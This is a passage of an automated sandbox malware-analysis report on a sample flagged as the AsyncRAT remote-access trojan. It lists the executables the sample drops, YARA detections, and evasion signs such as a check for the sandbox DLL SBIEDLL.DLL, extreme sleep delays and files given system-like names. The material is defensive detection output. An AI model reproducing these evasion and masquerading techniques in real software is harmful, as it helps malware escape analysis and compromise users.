                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\test.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\test.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\test.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\test.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\test.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\test.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\test.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\test.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\test.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\test.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\test.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\test.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\test.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\test.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\test.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\test.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\test.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\test.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\test.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\test.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\test.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\test.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\test.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\test.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\test.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\gay.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\gay.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\gay.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\gay.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\gay.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\gay.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\gay.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\gay.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\gay.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\gay.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\gay.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\gay.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\gay.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\gay.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\gay.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\gay.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\gay.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\gay.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\gay.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\gay.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\gay.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\22.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\22.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\aaa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\aaa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\aaa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\aaa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\aaa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\aaa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\aaa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\aaa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\aaa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\aaa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\aaa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\aaa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\aaa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\aaa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\aaa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\aaa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\aaa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\aaa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\aaa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\aaa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\aaa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\aaa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\aaa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\4.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: RIP_YOUR_PC_LOL.exe, type: SAMPLE
                    Source: Yara matchFile source: Process Memory Space: RIP_YOUR_PC_LOL.exe PID: 6880, type: MEMORYSTR
                    Yara detected AsyncRAT
                    Source: Yara matchFile source: RIP_YOUR_PC_LOL.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.206ac1d.13.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.RIP_YOUR_PC_LOL.exe.5a556c1.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.test.exe.da0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.1f6c52e.15.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.1f6c52e.15.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.3479694.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.95312e.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.0.test.exe.da0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.95312e.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.1fdd5e1.14.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.900000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.RIP_YOUR_PC_LOL.exe.5a556c1.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.3474284.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.14.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.935129.15.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.935129.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.900000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.900000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.95312e.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.0.test.exe.da0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.206ac1d.13.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.1fdd5e1.14.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.0.test.exe.da0000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.935129.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.206ac1d.13.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.935129.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.206ac1d.13.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.RIP_YOUR_PC_LOL.exe.59c8085.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.3479694.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.0.test.exe.da0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.95312e.13.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.900000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.935129.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.RIP_YOUR_PC_LOL.exe.596a627.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.95312e.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.900000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000000.397644420.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.388952115.00000000059C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000000.374606826.0000000001F6B000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.385235005.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.538356356.0000000003471000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.693319449.0000000001F6B000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000000.405813841.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.463698979.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000000.394727625.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000000.399704980.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.381351381.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.701012196.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.382829254.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.383946223.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: RIP_YOUR_PC_LOL.exe PID: 6880, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: healastounding.exe PID: 3572, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: test.exe PID: 6236, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\test.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\healastounding.exe, type: DROPPED
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.374606826.0000000001F6B000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.388952115.00000000059C7000.00000004.00000800.00020000.00000000.sdmp, healastounding.exe, healastounding.exe, 00000004.00000000.385235005.0000000000902000.00000002.00000001.01000000.00000005.sdmp, healastounding.exe, 00000004.00000002.538356356.0000000003471000.00000004.00000800.00020000.00000000.sdmp, test.exe, test.exe, 00000006.00000000.397644420.0000000000DA2000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exe TID: 7116Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\healastounding.exe TID: 5312Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe TID: 3440Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\gay.exe TID: 5732Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exe TID: 3456Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exe TID: 6076Thread sleep time: -40000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\aaa.exe TID: 5664Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\Opus.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_7-1468
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\healastounding.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\gay.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\aaa.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exeAPI coverage: 9.9 %
                    Source: C:\Users\user\AppData\Roaming\22.exeDropped PE file which has not been started: C:\Windows\Cursors\WUDFhosts.exeJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\22.exeDropped PE file which has not been started: C:\Windows\Help\Winlogon.exeJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\22.exeDropped PE file which has not been started: C:\Windows\Help\active_desktop_render.dllJump to dropped file
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\healastounding.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\gay.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeThread delayed: delay time: 922337203685477Jump to behavior
